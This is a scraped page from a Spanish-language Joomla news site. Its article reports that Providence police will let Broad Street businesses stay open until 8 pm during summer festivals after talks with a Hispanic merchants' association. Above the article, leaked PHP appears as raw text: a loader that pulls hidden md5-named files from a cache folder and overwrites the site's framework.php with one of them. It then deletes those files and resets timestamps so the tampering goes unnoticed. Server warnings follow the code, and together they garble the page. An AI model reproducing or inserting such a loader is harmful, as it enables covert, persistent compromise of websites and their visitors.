$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Negocios cerrarán más tarde durante festivales

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: PRIMERA PLANA

Negocios cerrarán más tarde durante festivales

Imprimir PDF

alt

PROVIDENCE, RI.- Buenas noticias para los comerciantes de la Broad Street, en Providence: a partir de agosto próximo, los negocios ubicados en esta vía podrán permanecer abiertos hasta las 8:00 de la noche, durante la celebración de los festivales de verano que se realizan en la zona. La medida excluye a los bares, tiendas de licores y discotecas.

La decisión fue tomada por el Departamento de Policía y el Comisionado de Seguridad de Providence, en respuesta a una petición de la Asociación de Comerciantes Hispanos de esta ciudad.

Los dueños de negocios plantearon a las autoridades las cuantiosas pérdidas que han enfrentado durante años debido a la medida que les obligaba a cerrar a las 6:00 de la tarde, los días de festival. Dicha medida comenzó a aplicarse hace siete años, afectando -en un solo tramo de la Broad- a por lo menos 114 establecimientos comerciales.

“Ha sido un gran logro, aunque nuestro objetivo es llegar a que no haya que cerrar”, expresó Pedro Espinal, presidente de la Asociación.

Hablando en exclusiva con Acontecer Latino, Espinal informó que el pasado 26 de junio, directivos y miembros de la asociación sostuvieron una reunión con el jefe del Departamento de Policía, coronel Hugh Clements, Jr. y el comisionado de Seguridad de Providence, Steven Pare, para discutir una estrategia que permitiera salvaguardar el orden público durante los festivales, sin perjudicar las actividades de los negocios. En esa reunión participaron además de Espinal, Laura Rodríguez, Felipe Frías, y Freddy Cuevas.

Gracias a ese encuentro –que se prolongó por dos horas- la policía aceptó, también, brindar más facilidades para el estacionamiento (permitirán hasta una hora) y flexibilizar las limitaciones para el tránsito de vehículos a través de esa vía. De igual manera, los comerciantes tendrán acceso al número de teléfono directo del comandante que esté de servicio ese día en la Broad.

Espinal explicó que los comerciantes se habían quejado durante años del inconveniente que supone para ellos verse obligados a cerrar sus tiendas justo cuando más movimiento de clientes hay en la Broad Street. La medida involucra de manera específica, al festival dominicano que organiza Quisqueya En Acción, y al puertorriqueño, que dejó de celebrarse hace un par de años.

“Nos enfocamos en que es sumamente importante que cuando vengan los miles de turistas que llegan aquí a través de esos festivales, ellos conozcan e inviertan en esos negocios, que sepan qué productos se exhiben aquí. Para que el comerciante pueda incrementar su venta, el contacto con el cliente es la parte vital. Nosotros apoyamos el festival y queremos tomar ventaja de los miles de personas que van a venir”, dijo.

Por su parte, Laura Rodríguez, quien es fundadora de la Asociación de Comerciantes Latinos de Providence junto con la senadora Ana Quezada, refirió que limitar la actividad de los comerciantes no es la solución, y que lo que debe hacer la policía es hacer mejor su trabajo. Puso como ejemplo la celebración del Convite Banilejo en Massachusetts, en el que participan miles de personas con un mínimo de incidentes.

La senadora Quezada, en tanto, se lamentó de que los negocios de la Broad no son valorados en la misma medida de los significativos aportes que hacen a la economía de la ciudad.

Espinal, Rodríguez y Quezada ofrecieron estas declaraciones durante un encuentro en el que participaron también los comerciantes Felipe Frías y Nina Reyes.

La Asociación de Comerciantes Hispanos de Providence fue creada en el 2016. Empezó con siete miembros, y en la actualidad tiene alrededor de 100. Si usted quiere saber cómo integrarse en esta organizacion llame al (401) 529-5901.